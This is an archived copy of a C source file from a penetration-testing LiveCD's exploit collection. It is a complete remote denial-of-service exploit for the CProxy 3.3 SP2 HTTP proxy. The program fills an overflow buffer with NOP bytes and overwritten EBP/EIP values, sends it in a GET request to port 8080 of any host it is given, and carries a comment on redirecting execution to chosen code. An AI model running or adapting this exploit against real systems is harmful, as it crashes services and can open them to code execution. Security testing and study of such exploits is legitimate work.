home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / cproxy / cproxy.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  2KB  |  109 lines

---

1. /*
2.  * Remote Denial of Service for CProxy v3.3 - Service Pack 2
3.  * 
4.  * (C) |[TDP]|  - HaCk-13 TeaM -  2000      <tdp@psynet.net>
5.  *
6.  *
7.  * This program xploits an overflow vulnerability in CProxy 3.3 SP2
8.  * HTTP Service (8080), causing server shutdown
9.  *
10.  * Greetings to all the other members and all my friends :) 
11.  */
12.  
13. #include <stdio.h>
14. #include <stdlib.h>
15. #include <unistd.h>
16. #include <sys/socket.h>
17. #include <sys/types.h>
18. #include <netdb.h>
19. #include <netinet/in.h>
20. #include <arpa/inet.h>
21.  
22. #define BUFFERSIZE 247
23. #define NOP 0x90
24. // If you change this values you can change EIP and EBP values
25. // to redirect to a code that you want >;)
26. #define EIP 0x61616161
27. #define EBP 0x61616161
28.  
29. void usage(char *progname)
30. {
31.   fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
32.   exit(1);
33. }
34.  
35. int main(int argc, char **argv)
36. {
37.   char *ptr,buffer[BUFFERSIZE], remotedos[1024];
38.   unsigned long *long_ptr,eip=EIP, ebp=EBP;
39.   int aux,sock;
40.   struct sockaddr_in sin;
41.   unsigned long ip;
42.   struct hostent *he;
43.  
44.   fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");
45.  
46.   if (argc<2) usage(argv[0]);
47.  
48.   if (argc>=3) eip+=atol(argv[2]);
49.  
50.   if (argc>=4) ebp+=atol(argv[3]);
51.  
52.   ptr=buffer;
53.   memset(ptr,0,sizeof(buffer));
54.   memset(ptr,NOP,sizeof(buffer)-8);
55.   ptr+=sizeof(buffer)-8;
56.   long_ptr=(unsigned long*)ptr;
57.   *(long_ptr++) = ebp;
58.   *(long_ptr++) = eip;
59.   ptr=(char *)long_ptr;
60.   *ptr='\0';
61.  
62.   bzero(remotedos, sizeof(remotedos));
63.   snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);
64.  
65.   if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
66.     {
67.       perror("socket()");
68.       return -1;
69.     }
70.  
71.   if ((he = gethostbyname(argv[1])) != NULL)
72.     {
73.       ip = *(unsigned long *)he->h_addr;
74.     }
75.   else
76.     {
77.       if ((ip = inet_addr(argv[1])) == NULL)
78.         {
79.           perror("inet_addr()");
80.           return -1;
81.         }
82.     }
83.  
84.   sin.sin_family = AF_INET;
85.   sin.sin_addr.s_addr = ip;
86.   sin.sin_port = htons(8080);
87.  
88.   fprintf(stderr,"\nEngaged...\n");
89.   if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
90.     {
91.       perror("connect()");
92.       return -1;
93.     }
94.  
95.   if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos))
96.     {
97.       perror("write()");
98.       return -1;
99.     }
100.  
101.   fprintf(stderr,"Bye Bye baby!...\n\n");
102.   if (close(sock) < 0)
103.     {
104.       perror("close()");
105.       return -1;
106.     }
107.   return(0);
108. }
109. /*                    www.hack.co.za           [18 May 2000]*/